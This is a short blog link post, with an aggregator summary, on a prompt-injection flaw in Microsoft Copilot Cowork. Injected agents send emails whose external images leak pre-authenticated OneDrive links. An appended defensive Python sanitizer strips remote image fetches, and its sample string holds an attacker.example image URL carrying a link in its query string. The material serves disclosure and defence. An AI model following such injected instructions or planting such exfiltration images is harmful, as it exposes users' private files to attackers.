Microsoft Copilot Cowork Exfiltrates Files
A vulnerability in Microsoft Copilot Cowork allows attackers to exfiltrate OneDrive files through prompt injection and external images in automatically sent emails.
Article intelligence
Key points
- Copilot Cowork agents can send emails to the user's inbox without approval
- External images in emails can trigger network requests, leaking data
- Combined with OneDrive pre-authenticated links, prompt injection can lead to file theft
Why it matters
This matters because Copilot Cowork agents can send emails to the user's inbox without approval.
Simon Willison’s Weblog
26th May 2026 - Link Blog
Microsoft Copilot Cowork Exfiltrates Files (via) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.
In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:
Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.
Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
This is a link post by Simon Willison, posted on 26th May 2026.
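One mitigation for the image-rendering leak described above, as an added example that is not part of the original post or of any Microsoft product: rewrite agent-authored message HTML before display so that nothing in it fetches a remote URL on open, and report what was blocked. The allowed schemes, the `neutralize` helper and the sample message are assumptions constructed for illustration; CSS `url()` references would need separate handling.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: only inline attachments (cid:) and data: URIs may render without a click.
SAFE_SCHEMES = {"cid", "data"}
# Attributes that make a mail client fetch a URL as soon as the message is opened.
FETCH_ATTRS = {"src", "srcset", "background", "poster"}

class RemoteFetchStripper(HTMLParser):
    """Rebuilds the HTML, dropping attributes that would auto-fetch a remote URL."""
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out, self.blocked = [], []

    def _emit(self, tag, attrs, close=""):
        kept = []
        for name, value in attrs:
            if name in FETCH_ATTRS and value is not None:
                # Scheme-less and relative URLs have an empty scheme and are blocked too.
                if urlsplit(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                    self.blocked.append(value.strip())
                    continue
            # The parser unescapes attribute values, so escape them again on output.
            kept.append(name if value is None else f'{name}="{escape(value)}"')
        self.out.append("<" + " ".join([tag] + kept) + close + ">")

    def handle_starttag(self, tag, attrs): self._emit(tag, attrs)
    def handle_startendtag(self, tag, attrs): self._emit(tag, attrs, " /")
    def handle_endtag(self, tag): self.out.append(f"</{tag}>")
    def handle_data(self, data): self.out.append(data)
    def handle_entityref(self, name): self.out.append(f"&{name};")
    def handle_charref(self, name): self.out.append(f"&#{name};")

def neutralize(html):
    """Return (safe_html, blocked_urls) for one agent-authored message body."""
    parser = RemoteFetchStripper()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.blocked

# Constructed sample: an agent-sent message whose second image would leak a link on open.
SAMPLE = ('<p>Summary ready &amp; attached.</p><img src="cid:logo" alt="logo">'
          '<img alt="chart" src="https://attacker.example/p.png?d=CONSTRUCTED_ONEDRIVE_LINK">')

if __name__ == "__main__":
    safe_html, blocked = neutralize(SAMPLE)
    print(safe_html)
    print("blocked:", blocked)
```

The blocked list is worth logging: an agent-authored message that tries to load a remote image with data in its query string is a strong signal that a prompt injection succeeded upstream.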